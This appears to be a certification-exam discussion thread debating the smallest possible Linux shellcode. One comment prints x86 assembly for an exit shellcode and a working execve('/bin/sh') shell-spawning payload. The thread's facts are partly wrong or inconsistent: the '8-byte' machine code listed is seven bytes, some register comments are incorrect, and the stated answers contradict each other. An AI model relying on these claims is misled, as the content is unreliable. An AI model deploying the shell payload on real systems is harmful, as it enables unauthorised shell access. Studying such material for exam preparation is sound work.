8 bytes
System Call Structure:
- Linux uses syscalls to interact with the kernel, and these are invoked using specific registers.
- The syscall for exit(0) (terminating the process) is one of the simplest examples.
8-Byte Example Shellcode (assembly code):
xor eax, eax ; Clears EAX register (sets exit code to 0)
inc eax ; Sets EAX to 1 (syscall number for `exit`)
xor ebx, ebx ; Clears EBX register (exit code argument)
int 0x80 ; Trigger the syscall interrupt
This shellcode:
- Sets up the syscall number for exit (1 in EAX).
- Clears the EBX register (sets exit code to 0).
- Executes the syscall with int 0x80.
Byte Representation (Machine Code):
The above assembly translates to an 8-byte machine code sequence: hexadecimal):
31 C0 40 31 DB CD 80
This is functional and minimal shellcode.
Here's a basic example of a small Linux shellcode in x86 assembly for spawning a shell:
assembly
section .text
global _start
_start:
xor eax, eax ; Clear EAX register
push eax ; Push a null byte onto the stack (terminating null)
push 0x68732f2f ; Push "/bin/sh" onto the stack
push 0x6e69622f
mov ebx, esp ; Set EBX to point to the string "/bin/sh"
push eax ; Push a null byte onto the stack (end of string)
mov edx, esp ; Set EDX to point to the null byte
push ebx ; Push the address of "/bin/sh" (EBX) onto the stack
mov ecx, esp ; Set ECX to point to the address of "/bin/sh"
mov al, 0xb ; Set AL to 11, which is the syscall number for execve
int 0x80 ; Call the kernel to execute "/bin/sh"
This is a minimal shellcode that spawns a shell ("/bin/sh") and is only 23 bytes in size.
--> 24 bytes
I'm pretty sure the answer is actually 8, unless this question is outdated. You can find a number of examples of Linux shellcode on the internet that are smaller than 24 bytes. I've seen one as small as 10.
upvoted 3 times
...
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
044f354
1 week, 5 days agotorabi123
1 month, 2 weeks agoBarryMacockener
1 year, 1 month ago